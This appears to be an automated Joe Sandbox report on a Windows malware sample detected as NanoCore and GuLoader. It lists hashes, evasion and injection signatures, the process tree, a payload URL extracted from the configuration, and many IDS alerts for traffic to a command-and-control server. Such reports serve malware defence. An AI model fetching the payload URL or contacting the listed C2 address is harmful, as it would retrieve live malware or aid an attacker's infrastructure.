Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.AIDetect.malware2.23037.exe

Overview

General Information

Sample Name:SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
Analysis ID:634855
MD5:be43b751bd103fe5a64b4e0aa7a30060
SHA1:ab293504fe7636c3cfc74718973bbd1cbca05fb4
SHA256:87eefb05fd8c133f8a0059e1bc695f652a2f7b0c297386d7a08fb37bdb76009b
Infos:

Detection

NanoCore, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Yara detected GuLoader
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • SecuriteInfo.com.W32.AIDetect.malware2.23037.exe (PID: 3104 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe" MD5: BE43B751BD103FE5A64B4E0AA7A30060)
    • CasPol.exe (PID: 8108 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Payload URL": "https://cdn.discordapp.com/attachments/963535165500588126/979423160845869128/nanoexp_bWgaxBaEn43.bin"}
SourceRuleDescriptionAuthorStrings
00000004.00000000.213653060266.0000000000630000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      AV Detection

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 8108, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

      E-Banking Fraud

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 8108, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

      Stealing of Sensitive Information

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 8108, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

      Remote Access Functionality

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 8108, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat
      Timestamp:192.168.11.2023.105.131.2284981552182816766 05/26/22-22:59:36.110765
      SID:2816766
      Source Port:49815
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984852182816766 05/26/22-23:02:46.099381
      SID:2816766
      Source Port:49848
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982552182816766 05/26/22-23:00:31.508103
      SID:2816766
      Source Port:49825
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984352182816718 05/26/22-23:02:15.749636
      SID:2816718
      Source Port:49843
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985852182816766 05/26/22-23:03:28.855065
      SID:2816766
      Source Port:49858
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984552182816766 05/26/22-23:02:28.261536
      SID:2816766
      Source Port:49845
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985552182816766 05/26/22-23:03:10.672551
      SID:2816766
      Source Port:49855
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980852182816766 05/26/22-22:58:52.132477
      SID:2816766
      Source Port:49808
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981252182816766 05/26/22-22:59:17.847332
      SID:2816766
      Source Port:49812
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983552182816766 05/26/22-23:01:32.797260
      SID:2816766
      Source Port:49835
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980252182816766 05/26/22-22:58:21.911604
      SID:2816766
      Source Port:49802
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:23.105.131.228192.168.11.205218498532810290 05/26/22-23:02:57.070574
      SID:2810290
      Source Port:5218
      Destination Port:49853
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982852182816766 05/26/22-23:00:49.935151
      SID:2816766
      Source Port:49828
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983852182816766 05/26/22-23:01:51.496168
      SID:2816766
      Source Port:49838
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985952182816718 05/26/22-23:03:34.321491
      SID:2816718
      Source Port:49859
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979952182816766 05/26/22-22:58:04.753817
      SID:2816766
      Source Port:49799
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984552182025019 05/26/22-23:02:26.487154
      SID:2025019
      Source Port:49845
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984852182025019 05/26/22-23:02:44.373603
      SID:2025019
      Source Port:49848
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985852182025019 05/26/22-23:03:27.284937
      SID:2025019
      Source Port:49858
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979252182816766 05/26/22-22:57:44.769854
      SID:2816766
      Source Port:49792
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985552182025019 05/26/22-23:03:08.914161
      SID:2025019
      Source Port:49855
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978252182816766 05/26/22-22:56:53.274979
      SID:2816766
      Source Port:49782
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982852182025019 05/26/22-23:00:48.235087
      SID:2025019
      Source Port:49828
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983852182025019 05/26/22-23:01:49.783134
      SID:2025019
      Source Port:49838
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284977552182025019 05/26/22-22:56:38.901418
      SID:2025019
      Source Port:49775
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986552182025019 05/26/22-23:04:10.629863
      SID:2025019
      Source Port:49865
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983252182816766 05/26/22-23:01:14.490168
      SID:2816766
      Source Port:49832
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985252182816766 05/26/22-23:02:52.215713
      SID:2816766
      Source Port:49852
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979052182816766 05/26/22-22:57:32.337282
      SID:2816766
      Source Port:49790
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980852182025019 05/26/22-22:58:50.992423
      SID:2025019
      Source Port:49808
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985752182025019 05/26/22-23:03:21.170637
      SID:2025019
      Source Port:49857
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982252182816766 05/26/22-23:00:13.070615
      SID:2816766
      Source Port:49822
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986252182816766 05/26/22-23:03:53.418371
      SID:2816766
      Source Port:49862
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984752182025019 05/26/22-23:02:38.235595
      SID:2025019
      Source Port:49847
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982752182025019 05/26/22-23:00:42.060298
      SID:2025019
      Source Port:49827
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983752182025019 05/26/22-23:01:43.592376
      SID:2025019
      Source Port:49837
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284976952182816766 05/26/22-22:56:27.805928
      SID:2816766
      Source Port:49769
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984252182816766 05/26/22-23:02:09.830094
      SID:2816766
      Source Port:49842
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978352182816718 05/26/22-22:56:58.156949
      SID:2816718
      Source Port:49783
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986452182816766 05/26/22-23:04:05.819303
      SID:2816766
      Source Port:49864
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978352182025019 05/26/22-22:56:57.850644
      SID:2025019
      Source Port:49783
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978052182816766 05/26/22-22:56:46.808015
      SID:2816766
      Source Port:49780
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982452182816766 05/26/22-23:00:25.238881
      SID:2816766
      Source Port:49824
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981452182816766 05/26/22-22:59:29.900867
      SID:2816766
      Source Port:49814
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982952182816766 05/26/22-23:00:56.084760
      SID:2816766
      Source Port:49829
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983452182816766 05/26/22-23:01:26.679844
      SID:2816766
      Source Port:49834
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978052182025019 05/26/22-22:56:45.202082
      SID:2025019
      Source Port:49780
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981952182816766 05/26/22-22:59:54.510819
      SID:2816766
      Source Port:49819
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985752182816766 05/26/22-23:03:22.706542
      SID:2816766
      Source Port:49857
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979052182025019 05/26/22-22:57:30.455323
      SID:2025019
      Source Port:49790
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980952182816766 05/26/22-22:58:58.970372
      SID:2816766
      Source Port:49809
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985452182816766 05/26/22-23:03:04.405194
      SID:2816766
      Source Port:49854
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984452182816766 05/26/22-23:02:22.023762
      SID:2816766
      Source Port:49844
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980252182816718 05/26/22-22:58:21.911604
      SID:2816718
      Source Port:49802
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:23.105.131.228192.168.11.205218497882810290 05/26/22-22:57:25.234060
      SID:2810290
      Source Port:5218
      Destination Port:49788
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979152182025019 05/26/22-22:57:36.817105
      SID:2025019
      Source Port:49791
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985652182816766 05/26/22-23:03:16.808039
      SID:2816766
      Source Port:49856
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981752182816766 05/26/22-22:59:48.482502
      SID:2816766
      Source Port:49817
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982752182816766 05/26/22-23:00:43.669560
      SID:2816766
      Source Port:49827
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984752182816766 05/26/22-23:02:39.985491
      SID:2816766
      Source Port:49847
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983752182816766 05/26/22-23:01:45.080902
      SID:2816766
      Source Port:49837
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284977152182025019 05/26/22-22:56:32.568998
      SID:2025019
      Source Port:49771
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980652182816766 05/26/22-22:58:40.386913
      SID:2816766
      Source Port:49806
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978252182025019 05/26/22-22:56:51.581864
      SID:2025019
      Source Port:49782
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981652182816766 05/26/22-22:59:42.426003
      SID:2816766
      Source Port:49816
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986552182816766 05/26/22-23:04:10.953670
      SID:2816766
      Source Port:49865
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979252182025019 05/26/22-22:57:43.061898
      SID:2025019
      Source Port:49792
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983652182816766 05/26/22-23:01:38.486462
      SID:2816766
      Source Port:49836
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982652182816766 05/26/22-23:00:37.718065
      SID:2816766
      Source Port:49826
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984652182816766 05/26/22-23:02:33.763111
      SID:2816766
      Source Port:49846
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980752182816766 05/26/22-22:58:46.392335
      SID:2816766
      Source Port:49807
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985352182025019 05/26/22-23:02:56.695701
      SID:2025019
      Source Port:49853
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978452182816766 05/26/22-22:57:05.959460
      SID:2816766
      Source Port:49784
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986352182025019 05/26/22-23:03:58.052969
      SID:2025019
      Source Port:49863
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981052182025019 05/26/22-22:59:03.494428
      SID:2025019
      Source Port:49810
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982052182025019 05/26/22-22:59:59.112186
      SID:2025019
      Source Port:49820
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979752182816766 05/26/22-22:57:58.434919
      SID:2816766
      Source Port:49797
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981352182025019 05/26/22-22:59:22.171911
      SID:2025019
      Source Port:49813
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984652182025019 05/26/22-23:02:32.786547
      SID:2025019
      Source Port:49846
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983052182025019 05/26/22-23:01:00.431074
      SID:2025019
      Source Port:49830
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980352182025019 05/26/22-22:58:26.260383
      SID:2025019
      Source Port:49803
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984052182025019 05/26/22-23:02:02.026018
      SID:2025019
      Source Port:49840
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983652182025019 05/26/22-23:01:37.235701
      SID:2025019
      Source Port:49836
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985952182025019 05/26/22-23:03:33.430761
      SID:2025019
      Source Port:49859
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979752182025019 05/26/22-22:57:56.674729
      SID:2025019
      Source Port:49797
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980652182025019 05/26/22-22:58:38.629823
      SID:2025019
      Source Port:49806
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982652182025019 05/26/22-23:00:35.948670
      SID:2025019
      Source Port:49826
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978752182816766 05/26/22-22:57:19.771138
      SID:2816766
      Source Port:49787
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986052182025019 05/26/22-23:03:39.544308
      SID:2025019
      Source Port:49860
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986052182816766 05/26/22-23:03:41.176317
      SID:2816766
      Source Port:49860
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978752182025019 05/26/22-22:57:17.891220
      SID:2025019
      Source Port:49787
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981652182025019 05/26/22-22:59:40.683320
      SID:2025019
      Source Port:49816
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983052182816766 05/26/22-23:01:02.224827
      SID:2816766
      Source Port:49830
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978452182025019 05/26/22-22:57:04.272476
      SID:2025019
      Source Port:49784
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981952182025019 05/26/22-22:59:53.028818
      SID:2025019
      Source Port:49819
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982952182025019 05/26/22-23:00:54.368958
      SID:2025019
      Source Port:49829
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983952182025019 05/26/22-23:01:55.905807
      SID:2025019
      Source Port:49839
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984052182816766 05/26/22-23:02:03.691808
      SID:2816766
      Source Port:49840
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983352182816766 05/26/22-23:01:20.521033
      SID:2816766
      Source Port:49833
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983552182816718 05/26/22-23:01:32.044894
      SID:2816718
      Source Port:49835
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981352182816766 05/26/22-22:59:23.359150
      SID:2816766
      Source Port:49813
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985352182816766 05/26/22-23:02:58.303798
      SID:2816766
      Source Port:49853
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980952182025019 05/26/22-22:58:57.214975
      SID:2025019
      Source Port:49809
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982352182816766 05/26/22-23:00:19.115887
      SID:2816766
      Source Port:49823
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986352182816766 05/26/22-23:03:59.744768
      SID:2816766
      Source Port:49863
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980452182816766 05/26/22-22:58:33.462147
      SID:2816766
      Source Port:49804
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:23.105.131.228192.168.11.205218498012841753 05/26/22-22:58:15.567728
      SID:2841753
      Source Port:5218
      Destination Port:49801
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984352182816766 05/26/22-23:02:16.034084
      SID:2816766
      Source Port:49843
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983952182816766 05/26/22-23:01:57.503381
      SID:2816766
      Source Port:49839
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985952182816766 05/26/22-23:03:34.975066
      SID:2816766
      Source Port:49859
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985652182025019 05/26/22-23:03:15.071719
      SID:2025019
      Source Port:49856
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979152182816766 05/26/22-22:57:38.723479
      SID:2816766
      Source Port:49791
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284977152182816766 05/26/22-22:56:32.900519
      SID:2816766
      Source Port:49771
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980352182816766 05/26/22-22:58:28.062184
      SID:2816766
      Source Port:49803
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980052182025019 05/26/22-22:58:09.059966
      SID:2025019
      Source Port:49800
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980752182025019 05/26/22-22:58:44.885942
      SID:2025019
      Source Port:49807
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986152182816766 05/26/22-23:03:47.300693
      SID:2816766
      Source Port:49861
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979652182025019 05/26/22-22:57:49.469914
      SID:2025019
      Source Port:49796
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981752182025019 05/26/22-22:59:46.862759
      SID:2025019
      Source Port:49817
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978652182025019 05/26/22-22:57:10.680744
      SID:2025019
      Source Port:49786
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978852182816766 05/26/22-22:57:25.903337
      SID:2816766
      Source Port:49788
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983152182816766 05/26/22-23:01:08.320653
      SID:2816766
      Source Port:49831
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284976852182816766 05/26/22-22:56:20.953682
      SID:2816766
      Source Port:49768
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284976952182025019 05/26/22-22:56:26.199314
      SID:2025019
      Source Port:49769
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983452182025019 05/26/22-23:01:24.979877
      SID:2025019
      Source Port:49834
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980152182025019 05/26/22-22:58:15.250696
      SID:2025019
      Source Port:49801
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984452182025019 05/26/22-23:02:20.370858
      SID:2025019
      Source Port:49844
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981152182025019 05/26/22-22:59:09.758921
      SID:2025019
      Source Port:49811
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982152182025019 05/26/22-23:00:05.205755
      SID:2025019
      Source Port:49821
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986452182025019 05/26/22-23:04:04.336780
      SID:2025019
      Source Port:49864
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985452182025019 05/26/22-23:03:02.819470
      SID:2025019
      Source Port:49854
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982152182816766 05/26/22-23:00:06.968002
      SID:2816766
      Source Port:49821
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981152182816766 05/26/22-22:59:11.357229
      SID:2816766
      Source Port:49811
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983152182025019 05/26/22-23:01:06.610183
      SID:2025019
